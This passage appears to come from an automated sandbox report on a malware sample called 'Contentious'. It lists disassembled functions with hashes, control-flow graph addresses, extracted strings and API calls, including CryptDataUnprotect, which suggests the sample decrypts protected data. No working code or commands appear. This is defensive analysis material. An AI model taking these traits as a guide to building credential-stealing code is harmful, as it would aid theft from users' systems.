                                            • API ID: CryptDataUnprotect
                                            • String ID:
                                            • API String ID: 834300711-0
                                            • Opcode ID: 474b6b3f5a097b75ab1319c3f311e3e22a551201ad8fe8c90b8b9cccae4e0d31
                                            • Instruction ID: 90526275bec587f8332f9272a09f1155d4f326634793e7db3ab78aea013d299b
                                            • Opcode Fuzzy Hash: 474b6b3f5a097b75ab1319c3f311e3e22a551201ad8fe8c90b8b9cccae4e0d31
                                            • Instruction Fuzzy Hash: C01156B2800349DFCB10DF99C845BDEBFF4EB48320F148419EA58A7210C375A690DFA5
                                            Function 20CB7588 Relevance: .5, Instructions: 531COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e7986511360bb549f87bebb2db34538b054c7e192ca59d28464b35af78dc7479
                                            • Instruction ID: 2c819760caffb001eb0d6f99dd9561d419b28d1c2cba0258f59bca28d7d623f3
                                            • Opcode Fuzzy Hash: e7986511360bb549f87bebb2db34538b054c7e192ca59d28464b35af78dc7479
                                            • Instruction Fuzzy Hash: 76222DB4E012188FDB14DFA9C994B9DBBF2BF88304F1086A9D809AB355DB359D85CF50
                                            Function 238285B0 Relevance: .3, Instructions: 296COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1ed668cbc1e6b6f80e04ce08e8eadd8dd65422beef1392b4ae325773e49a13a0
                                            • Instruction ID: 346655ef013406d3a85af0dc92ff1e204bfe6a4f83458d5bb36bfd2368458fe0
                                            • Opcode Fuzzy Hash: 1ed668cbc1e6b6f80e04ce08e8eadd8dd65422beef1392b4ae325773e49a13a0
                                            • Instruction Fuzzy Hash: 11E1CFB4E01218CFEB14DFA5C954B9DBBF2BF89305F2081A9D809AB395DB355A85CF10
                                            Function 0015F778 Relevance: .3, Instructions: 292COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 076e1a985258baef014e78a8a952003c45e0b826fbc11fd64d25f5f57d3dec20
                                            • Instruction ID: 7b19cf96e72b715c26710abb853ae9f22307c50b6b3228a753a96a8676860d62
                                            • Opcode Fuzzy Hash: 076e1a985258baef014e78a8a952003c45e0b826fbc11fd64d25f5f57d3dec20
                                            • Instruction Fuzzy Hash: 06D1BF74E00218CFDB14DFA5C954BADBBF2BF88305F2081A9D819AB365DB355A86CF50
                                            Function 20CB0D60 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7893245f69c17445bdf82c8e9f17031f30a92dcc4630fda8eeb33dedaf22b6e2
                                            • Instruction ID: 7ef0c9fa3f948466b00d41877ff26427ca57b3cd0a60c3dbfc7dd5a73d9bb7ae
                                            • Opcode Fuzzy Hash: 7893245f69c17445bdf82c8e9f17031f30a92dcc4630fda8eeb33dedaf22b6e2
                                            • Instruction Fuzzy Hash: D9C19C74E00218CFDB14DFA5D994B9DBBF2BB89305F2080A9D819AB365DB359A81CF50
                                            Function 23820498 Relevance: .3, Instructions: 268COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2946784303.0000000023820000.00000040.00000800.00020000.00000000.sdmp, Offset: 23820000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_23820000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ac973b9d51172be48200fdfe3f2bf16491cb98aa9ad6234eee0c78f22314c765
                                            • Instruction ID: ac6ca493728844386607601a36aa6fa0e3ddd6f2d65f66e1b08a200f69d64590
                                            • Opcode Fuzzy Hash: ac973b9d51172be48200fdfe3f2bf16491cb98aa9ad6234eee0c78f22314c765
                                            • Instruction Fuzzy Hash: 0AC1A1B4E01218CFDB14DFA5C994B9DBBF2AF89305F2081A9D809AB365DB355E81CF50
                                            Function 20CB11B0 Relevance: .2, Instructions: 222COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 365d8b581470262b65bfc7d98e96dfd58f86a4fc5abf8a7a3e51443489611fb0
                                            • Instruction ID: 6c6d254dce637b1d16349eccf1eec42283b817909db6caf7536e7d5ed4cdc3d4
                                            • Opcode Fuzzy Hash: 365d8b581470262b65bfc7d98e96dfd58f86a4fc5abf8a7a3e51443489611fb0
                                            • Instruction Fuzzy Hash: 40A1E470D002188FEB14DFA9C994BDDBBF1BF89300F209269E419AB3A1DB759985CF51
                                            Function 20CB11C0 Relevance: .2, Instructions: 220COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 494f01f93a354fd92332a67d71efef84f15fc85862d52f3fc2a65096c8fff846
                                            • Instruction ID: 9ea1f6bec034a51e61451ce569bbbe240315542d19c00edb491808b2b1e3d0b1
                                            • Opcode Fuzzy Hash: 494f01f93a354fd92332a67d71efef84f15fc85862d52f3fc2a65096c8fff846
                                            • Instruction Fuzzy Hash: 1EA1F3B0D00218CFEB14DFA9C954B9DBBF1BF89310F208269E418AB3A1DB749985CF51
                                            Function 20CB1506 Relevance: .2, Instructions: 202COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: d93fa5b540e342dbe54ce073c0038848395ef513e663ee573ea2472b166c400b
                                            • Instruction ID: 7e20723319a93a8449564e0d1be30fc06bbae3d8e233d9148e22721cc17f93ec
                                            • Opcode Fuzzy Hash: d93fa5b540e342dbe54ce073c0038848395ef513e663ee573ea2472b166c400b
                                            • Instruction Fuzzy Hash: 1591E2B0900218CFDB10DFA9C984BDDBBF1BF89310F209269E419AB3A1DB759985CF55
                                            Function 20CB0D50 Relevance: .1, Instructions: 102COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: af8fda0ddf15e8842687c31159f276556de5507206054d1b4a7ed6c7d2c4148d
                                            • Instruction ID: 7af7b644701db7c1a5266cf847d5bea5371e37f6c37254dca21f225fb97fc90c
                                            • Opcode Fuzzy Hash: af8fda0ddf15e8842687c31159f276556de5507206054d1b4a7ed6c7d2c4148d
                                            • Instruction Fuzzy Hash: 1E41D2B4D01648CFEB18CFEAD85469DBBF2AF89300F24C16AD419AB265DB344946CF00
                                            Function 20424F6F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 263 20424f6f-20424fff GetCurrentProcess 267 20425001-20425007 263->267 268 20425008-2042503c GetCurrentThread 263->268 267->268 269 20425045-20425079 GetCurrentProcess 268->269 270 2042503e-20425044 268->270 272 20425082-2042509d call 2042513f 269->272 273 2042507b-20425081 269->273 270->269 276 204250a3-204250d2 GetCurrentThreadId 272->276 273->272 277 204250d4-204250da 276->277 278 204250db-2042513d 276->278 277->278
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 20424FEE
                                            • GetCurrentThread.KERNEL32 ref: 2042502B
                                            • GetCurrentProcess.KERNEL32 ref: 20425068
                                            • GetCurrentThreadId.KERNEL32 ref: 204250C1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942494015.0000000020420000.00000040.00000800.00020000.00000000.sdmp, Offset: 20420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20420000_Contentious.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID: ,NM $,iM
                                            • API String ID: 2063062207-2075253796
                                            • Opcode ID: 625408b14f5f9b76904e9040b6c9b47e284ec1069cb62a4fbc5f390d4d883524
                                            • Instruction ID: 64bb9fc8c2c900e20c041a809af7991f464f024de7d9f81b40e3e2ae7cf6663c
                                            • Opcode Fuzzy Hash: 625408b14f5f9b76904e9040b6c9b47e284ec1069cb62a4fbc5f390d4d883524
                                            • Instruction Fuzzy Hash: E35157B0A007498FDB14DFA9D988B9EBBF1EF88310F20C559E419A7360DB785944CF65
                                            Function 20424F70 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128threadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 285 20424f70-20424fff GetCurrentProcess 289 20425001-20425007 285->289 290 20425008-2042503c GetCurrentThread 285->290 289->290 291 20425045-20425079 GetCurrentProcess 290->291 292 2042503e-20425044 290->292 294 20425082-2042509d call 2042513f 291->294 295 2042507b-20425081 291->295 292->291 298 204250a3-204250d2 GetCurrentThreadId 294->298 295->294 299 204250d4-204250da 298->299 300 204250db-2042513d 298->300 299->300
                                            APIs
                                            • GetCurrentProcess.KERNEL32 ref: 20424FEE
                                            • GetCurrentThread.KERNEL32 ref: 2042502B
                                            • GetCurrentProcess.KERNEL32 ref: 20425068
                                            • GetCurrentThreadId.KERNEL32 ref: 204250C1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2942494015.0000000020420000.00000040.00000800.00020000.00000000.sdmp, Offset: 20420000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20420000_Contentious.jbxd
                                            Similarity
                                            • API ID: Current$ProcessThread
                                            • String ID: ,NM $,iM
                                            • API String ID: 2063062207-2075253796
                                            • Opcode ID: 70eb80dc4bab4e94dd5989af80d558879523202a6892780e7ece1793b72f187c
                                            • Instruction ID: 942218f0a49b39ed092beeb4e7601a7825e473cf3262260308dd15fe7d26f8aa
                                            • Opcode Fuzzy Hash: 70eb80dc4bab4e94dd5989af80d558879523202a6892780e7ece1793b72f187c
                                            • Instruction Fuzzy Hash: 7D5168B0A007498FDB14DFA9D988B9EBBF1EF88310F20C559E419A7360DB785940CF65
                                            Function 00156E58 Relevance: 10.5, Strings: 8, Instructions: 475COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 307 156e58-156e8d 308 156e93-156eb6 307->308 309 1572bc-1572c0 307->309 318 156f64-156f68 308->318 319 156ebc-156ec9 308->319 310 1572c2-1572d6 309->310 311 1572d9-1572e7 309->311 316 1572e9-1572fe 311->316 317 157358-15736d 311->317 327 157305-157312 316->327 328 157300-157303 316->328 329 157374-157381 317->329 330 15736f-157372 317->330 320 156fb0-156fb9 318->320 321 156f6a-156f78 318->321 333 156ed8 319->333 334 156ecb-156ed6 319->334 324 1573cf 320->324 325 156fbf-156fc9 320->325 321->320 341 156f7a-156f95 321->341 342 1573d4-157404 324->342 325->309 331 156fcf-156fd8 325->331 335 157314-157355 327->335 328->335 336 157383-1573be 329->336 330->336 339 156fe7-156ff3 331->339 340 156fda-156fdf 331->340 343 156eda-156edc 333->343 334->343 383 1573c5-1573cc 336->383 339->342 347 156ff9-156fff 339->347 340->339 367 156f97-156fa1 341->367 368 156fa3 341->368 360 157406-15741c 342->360 361 15741d-157424 342->361 343->318 344 156ee2-156f44 343->344 395 156f46 344->395 396 156f4a-156f61 344->396 350 157005-157015 347->350 351 1572a6-1572aa 347->351 365 157017-157027 350->365 366 157029-15702b 350->366 351->324 354 1572b0-1572b6 351->354 354->309 354->331 369 15702e-157034 365->369 366->369 370 156fa5-156fa7 367->370 368->370 369->351 377 15703a-157049 369->377 370->320 378 156fa9 370->378 379 1570f7-157122 call 156ca0 * 2 377->379 380 15704f 377->380 378->320 397 15720c-157226 379->397 398 157128-15712c 379->398 381 157052-157063 380->381 381->342 386 157069-15707b 381->386 386->342 388 157081-157099 386->388 451 15709b call 157438 388->451 452 15709b call 157428 388->452 391 1570a1-1570b1 391->351 394 1570b7-1570ba 391->394 399 1570c4-1570c7 394->399 400 1570bc-1570c2 394->400 395->396 396->318 397->309 420 15722c-157230 397->420 398->351 402 157132-157136 398->402 399->324 403 1570cd-1570d0 399->403 400->399 400->403 405 15715e-157164 402->405 406 157138-157145 402->406 407 1570d2-1570d6 403->407 408 1570d8-1570db 403->408 409 157166-15716a 405->409 410 15719f-1571a5 405->410 423 157154 406->423 424 157147-157152 406->424 407->408 411 1570e1-1570e5 407->411 408->324 408->411 409->410 412 15716c-157175 409->412 413 1571a7-1571ab 410->413 414 1571b1-1571b7 410->414 411->324 417 1570eb-1570f1 411->417 418 157184-15719a 412->418 419 157177-15717c 412->419 413->383 413->414 421 1571c3-1571c5 414->421 422 1571b9-1571bd 414->422 417->379 417->381 418->351 419->418 425 157232-15723c call 155b50 420->425 426 15726c-157270 420->426 427 1571c7-1571d0 421->427 428 1571fa-1571fc 421->428 422->351 422->421 429 157156-157158 423->429 424->429 425->426 440 15723e-157253 425->440 426->383 432 157276-15727a 426->432 435 1571d2-1571d7 427->435 436 1571df-1571f5 427->436 428->351 430 157202-157209 428->430 429->351 429->405 432->383 437 157280-15728d 432->437 435->436 436->351 442 15729c 437->442 443 15728f-15729a 437->443 440->426 448 157255-15726a 440->448 445 15729e-1572a0 442->445 443->445 445->351 445->383 448->309 448->426 451->391 452->391
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                            • API String ID: 0-1932283790
                                            • Opcode ID: 4bf28f65c6640cd583edc9a4937a6c024db9d42335f3cb16e1303a04dd5782c6
                                            • Instruction ID: 5f0cf5e85a2f1897c01bd526a028013add436b61515594d4c84dd11cc0aff6b2
                                            • Opcode Fuzzy Hash: 4bf28f65c6640cd583edc9a4937a6c024db9d42335f3cb16e1303a04dd5782c6
                                            • Instruction Fuzzy Hash: E0126B30A04218CFCB14CF69D895AAEBBF2FF49316F158559E829DB2A1DB30ED45CB50
                                            Function 20CB1CB0 Relevance: 5.2, Strings: 4, Instructions: 229COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1172 20cb1cb0-20cb1cf7 1176 20cb1cfd-20cb1cff 1172->1176 1177 20cb1ed3-20cb1ede 1172->1177 1178 20cb1ee5-20cb1ef0 1176->1178 1179 20cb1d05-20cb1d09 1176->1179 1177->1178 1184 20cb1ef7-20cb1f02 1178->1184 1179->1178 1181 20cb1d0f-20cb1d47 1179->1181 1181->1184 1193 20cb1d4d-20cb1d51 1181->1193 1188 20cb1f09-20cb1f14 1184->1188 1192 20cb1f1b-20cb1f47 1188->1192 1228 20cb1f4e-20cb1f7a 1192->1228 1194 20cb1d5d-20cb1d61 1193->1194 1195 20cb1d53-20cb1d57 1193->1195 1197 20cb1d6c-20cb1d70 1194->1197 1198 20cb1d63-20cb1d6a 1194->1198 1195->1188 1195->1194 1199 20cb1d88-20cb1d8c 1197->1199 1200 20cb1d72-20cb1d76 1197->1200 1198->1199 1203 20cb1d8e-20cb1d90 1199->1203 1204 20cb1d93-20cb1d9a 1199->1204 1201 20cb1d78-20cb1d7f 1200->1201 1202 20cb1d81 1200->1202 1201->1199 1202->1199 1203->1204 1206 20cb1d9c 1204->1206 1207 20cb1da3-20cb1da7 1204->1207 1206->1207 1208 20cb1e58-20cb1e5b 1206->1208 1209 20cb1ec1-20cb1ecc 1206->1209 1210 20cb1df6-20cb1df9 1206->1210 1211 20cb1e25-20cb1e28 1206->1211 1212 20cb1dad-20cb1db1 1207->1212 1213 20cb1e86-20cb1e89 1207->1213 1215 20cb1e5d 1208->1215 1216 20cb1e62-20cb1e81 1208->1216 1209->1177 1217 20cb1dfb-20cb1dfe 1210->1217 1218 20cb1e04-20cb1e23 1210->1218 1222 20cb1e2a-20cb1e2d 1211->1222 1223 20cb1e33-20cb1e56 1211->1223 1212->1209 1219 20cb1db7-20cb1dba 1212->1219 1220 20cb1e8b-20cb1e8e 1213->1220 1221 20cb1e99-20cb1ebc 1213->1221 1215->1216 1242 20cb1ddf-20cb1de3 1216->1242 1217->1192 1217->1218 1218->1242 1225 20cb1dbc 1219->1225 1226 20cb1dc1-20cb1ddd 1219->1226 1220->1221 1227 20cb1e90-20cb1e93 1220->1227 1221->1242 1222->1223 1222->1228 1223->1242 1225->1226 1226->1242 1227->1221 1232 20cb1f81-20cb1fbe 1227->1232 1228->1232 1252 20cb1de6 call 20cb24d8 1242->1252 1253 20cb1de6 call 20cb24d4 1242->1253 1246 20cb1dec-20cb1df3 1252->1246 1253->1246
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2944201662.0000000020CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 20CB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_20cb0000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $Hbq$Hbq$Hbq
                                            • API String ID: 0-580995494
                                            • Opcode ID: e48f61a33321108fe28710f3ec15587018df5c74aabd7305b1681f97c99716c9
                                            • Instruction ID: 603e4f3c6c56e30cf3948ef5d057a4bb15ec73a7c02f001e37f20b0788db1d11
                                            • Opcode Fuzzy Hash: e48f61a33321108fe28710f3ec15587018df5c74aabd7305b1681f97c99716c9
                                            • Instruction Fuzzy Hash: 2481E8747002449FCF155FB8985866E3AA2AFC5361F604629FD26DB3E2CF358E82CB51
                                            Function 001587E9 Relevance: 4.3, Strings: 3, Instructions: 503COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1804 1587e9-158805 1805 158807-15880c 1804->1805 1806 158811-15881d 1804->1806 1807 158ba6-158bab 1805->1807 1809 15882d-158832 1806->1809 1810 15881f-158821 1806->1810 1809->1807 1811 158829-15882b 1810->1811 1811->1809 1812 158837-158843 1811->1812 1814 158845-158851 1812->1814 1815 158853-158858 1812->1815 1814->1815 1817 15885d-158868 1814->1817 1815->1807 1819 158912-15891d 1817->1819 1820 15886e-158879 1817->1820 1823 1589c0-1589cc 1819->1823 1824 158923-158932 1819->1824 1825 15888f 1820->1825 1826 15887b-15888d 1820->1826 1833 1589dc-1589ee 1823->1833 1834 1589ce-1589da 1823->1834 1835 158934-15893e 1824->1835 1836 158943-158952 1824->1836 1827 158894-158896 1825->1827 1826->1827 1831 1588b6-1588bb 1827->1831 1832 158898-1588a7 1827->1832 1831->1807 1832->1831 1838 1588a9-1588b4 1832->1838 1851 1589f0-1589fc 1833->1851 1852 158a12-158a17 1833->1852 1834->1833 1843 158a1c-158a27 1834->1843 1835->1807 1844 158954-158960 1836->1844 1845 158976-15897f 1836->1845 1838->1831 1849 1588c0-1588c9 1838->1849 1856 158a2d-158a36 1843->1856 1857 158b09-158b14 1843->1857 1854 158962-158967 1844->1854 1855 15896c-158971 1844->1855 1858 158995 1845->1858 1859 158981-158993 1845->1859 1864 1588d5-1588e4 1849->1864 1865 1588cb-1588d0 1849->1865 1869 1589fe-158a03 1851->1869 1870 158a08-158a0d 1851->1870 1852->1807 1854->1807 1855->1807 1871 158a4c 1856->1871 1872 158a38-158a4a 1856->1872 1873 158b16-158b20 1857->1873 1874 158b3e-158b4d 1857->1874 1861 15899a-15899c 1858->1861 1859->1861 1861->1823 1867 15899e-1589aa 1861->1867 1882 1588e6-1588f2 1864->1882 1883 158908-15890d 1864->1883 1865->1807 1884 1589b6-1589bb 1867->1884 1885 1589ac-1589b1 1867->1885 1869->1807 1870->1807 1875 158a51-158a53 1871->1875 1872->1875 1887 158b37-158b3c 1873->1887 1888 158b22-158b2e 1873->1888 1889 158ba1 1874->1889 1890 158b4f-158b5e 1874->1890 1880 158a55-158a61 1875->1880 1881 158a63 1875->1881 1891 158a68-158a6a 1880->1891 1881->1891 1898 1588f4-1588f9 1882->1898 1899 1588fe-158903 1882->1899 1883->1807 1884->1807 1885->1807 1887->1807 1888->1887 1901 158b30-158b35 1888->1901 1889->1807 1890->1889 1902 158b60-158b78 1890->1902 1892 158a76-158a89 1891->1892 1893 158a6c-158a71 1891->1893 1903 158ac1-158acb 1892->1903 1904 158a8b 1892->1904 1893->1807 1898->1807 1899->1807 1901->1807 1914 158b9a-158b9f 1902->1914 1915 158b7a-158b98 1902->1915 1910 158acd-158ad9 call 158258 1903->1910 1911 158aea-158af6 1903->1911 1905 158a8e-158a9f call 158258 1904->1905 1916 158aa6-158aab 1905->1916 1917 158aa1-158aa4 1905->1917 1921 158ae0-158ae5 1910->1921 1922 158adb-158ade 1910->1922 1924 158aff 1911->1924 1925 158af8-158afd 1911->1925 1914->1807 1915->1807 1916->1807 1917->1916 1920 158ab0-158ab3 1917->1920 1926 158bac-158bc0 1920->1926 1927 158ab9-158abf 1920->1927 1921->1807 1922->1911 1922->1921 1928 158b04 1924->1928 1925->1928 1931 158c12 1926->1931 1932 158bc2-158bd4 1926->1932 1927->1903 1927->1905 1928->1807 1934 158c17-158c19 1931->1934 1935 158bd6-158bdb 1932->1935 1936 158be0-158beb 1932->1936 1937 158c4e-158c60 1934->1937 1938 158c1b-158c2a 1934->1938 1939 158d61-158d65 1935->1939 1941 158bf1-158bfc 1936->1941 1942 158c93-158c9c 1936->1942 1945 158c66-158c74 1937->1945 1946 158d5f 1937->1946 1938->1937 1947 158c2c-158c42 1938->1947 1941->1931 1952 158bfe-158c10 1941->1952 1950 158ce7-158cf2 1942->1950 1951 158c9e-158ca9 1942->1951 1955 158c76-158c7b 1945->1955 1956 158c80-158c83 1945->1956 1946->1939 1947->1937 1963 158c44-158c49 1947->1963 1966 158cf4-158d06 1950->1966 1967 158d08 1950->1967 1951->1946 1964 158caf-158cc1 1951->1964 1952->1934 1955->1939 1960 158d66-158d96 call 158378 1956->1960 1961 158c89-158c8c 1956->1961 1984 158dad-158db1 1960->1984 1985 158d98-158dac 1960->1985 1961->1945 1965 158c8e 1961->1965 1963->1939 1964->1946 1973 158cc7-158ccb 1964->1973 1965->1946 1968 158d0d-158d0f 1966->1968 1967->1968 1968->1946 1971 158d11-158d20 1968->1971 1979 158d22-158d2b 1971->1979 1980 158d48 1971->1980 1976 158cd7-158cda 1973->1976 1977 158ccd-158cd2 1973->1977 1976->1960 1981 158ce0-158ce3 1976->1981 1977->1939 1989 158d41 1979->1989 1990 158d2d-158d3f 1979->1990 1986 158d4d-158d4f 1980->1986 1981->1973 1983 158ce5 1981->1983 1983->1946 1986->1946 1987 158d51-158d5d 1986->1987 1987->1939 1993 158d46 1989->1993 1990->1993 1993->1986
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 4'^q$4'^q$;^q
                                            • API String ID: 0-799016360
                                            • Opcode ID: b777e197e036604791428661e70805ccc5464ffe68a8287f2941e236c8e0bab5
                                            • Instruction ID: a036f6a1d78c48e4ad2a50c6135c66b9a4fc3ae9739a7c4f60ec955dccd33b79
                                            • Opcode Fuzzy Hash: b777e197e036604791428661e70805ccc5464ffe68a8287f2941e236c8e0bab5
                                            • Instruction Fuzzy Hash: F2F18E70304201CFDB199B39C854B3977EAAF85706F1944AAE826EF3A1EF65CC89C751
                                            Function 001577F0 Relevance: 3.2, Strings: 2, Instructions: 702COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 2241 1577f0-157cde 2316 157ce4-157cf4 2241->2316 2317 158230-158265 2241->2317 2316->2317 2318 157cfa-157d0a 2316->2318 2321 158267-15826c 2317->2321 2322 158271-15828f 2317->2322 2318->2317 2320 157d10-157d20 2318->2320 2320->2317 2323 157d26-157d36 2320->2323 2324 158356-15835b 2321->2324 2334 158306-158312 2322->2334 2335 158291-15829b 2322->2335 2323->2317 2325 157d3c-157d4c 2323->2325 2325->2317 2327 157d52-157d62 2325->2327 2327->2317 2328 157d68-157d78 2327->2328 2328->2317 2330 157d7e-157d8e 2328->2330 2330->2317 2331 157d94-157da4 2330->2331 2331->2317 2333 157daa-157dba 2331->2333 2333->2317 2336 157dc0-15822f 2333->2336 2340 158314-158320 2334->2340 2341 158329-158335 2334->2341 2335->2334 2342 15829d-1582a9 2335->2342 2340->2341 2348 158322-158327 2340->2348 2349 158337-158343 2341->2349 2350 15834c-15834e 2341->2350 2351 1582ce-1582d1 2342->2351 2352 1582ab-1582b6 2342->2352 2348->2324 2349->2350 2362 158345-15834a 2349->2362 2350->2324 2432 158350 call 1587e9 2350->2432 2353 1582d3-1582df 2351->2353 2354 1582e8-1582f4 2351->2354 2352->2351 2360 1582b8-1582c2 2352->2360 2353->2354 2366 1582e1-1582e6 2353->2366 2358 1582f6-1582fd 2354->2358 2359 15835c-15837e 2354->2359 2358->2359 2363 1582ff-158304 2358->2363 2367 158380 2359->2367 2368 15838e 2359->2368 2360->2351 2370 1582c4-1582c9 2360->2370 2362->2324 2363->2324 2366->2324 2367->2368 2371 158387-15838c 2367->2371 2373 158390-158391 2368->2373 2370->2324 2371->2373 2432->2324
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2923282184.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_150000_Contentious.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $^q$$^q
                                            • API String ID: 0-355816377
                                            • Opcode ID: d7483f008fea2b8a50ffc005030ef4c79dea304e8ef2b2e61d64b0111ff9f252
                                            • Instruction ID: d3e7aadd0dd4b5bce0935b4ce763a9226a9ef638843e69de91c934fc999035bc
                                            • Opcode Fuzzy Hash: d7483f008fea2b8a50ffc005030ef4c79dea304e8ef2b2e61d64b0111ff9f252
                                            • Instruction Fuzzy Hash: 69523174A04218CFEB649BA4C860BAEBBB2FF44301F1081A9D50A7B795DF345E85DF91
                                            Function 001556A8 Relevance: 2.8, Strings: 2, Instructions: 326COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 3084 1556a8-1556ca 3085 1556e0-1556eb 3084->3085 3086 1556cc-1556d0 3084->3086 3089 1556f1-1556f3 3085->3089 3090 155793-1557bf 3085->3090 3087 1556d2-1556de 3086->3087 3088 1556f8-1556ff 3086->3088 3087->3085 3087->3088 3091 155701-155708 3088->3091 3092 15571f-155728 3088->3092 3093 15578b-155790 3089->3093 3097 1557c6-15581e 3090->3097 3091->3092 3095 15570a-155715 3091->3095 3192 15572a call 23821bd0 3092->3192 3193 15572a call 23821bc1 3092->3193 3194 15572a call 23821ca1 3092->3194 3195 15572a call 155698 3092->3195 3196 15572a call 1556a8 3092->3196 3095->3097 3098 15571b-15571d 3095->3098 3096 155730-155732 3099 155734-155738 3096->3099 3100 15573a-155742 3096->3100 3116 155820-155826 3097->3116 3117 15582d-15583f 3097->3117 3098->3093 3099->3100 3102 155755-155774 call 156108 3099->3102 3103 155744-155749 3100->3103 3104 155751-155753 3100->3104 3110 155776-15577f 3102->3110 3111 155789 3102->3111 3103->3104 3104->3093 3187 155781 call 15a650 3110->3187 3188 155781 call 15a70d 3110->3188 3111->3093 3113 155787 3113->3093 3116->3117 3119 155845-155849 3117->3119 3120 1558d3-1558d5 3117->3120 3121 155859-155866 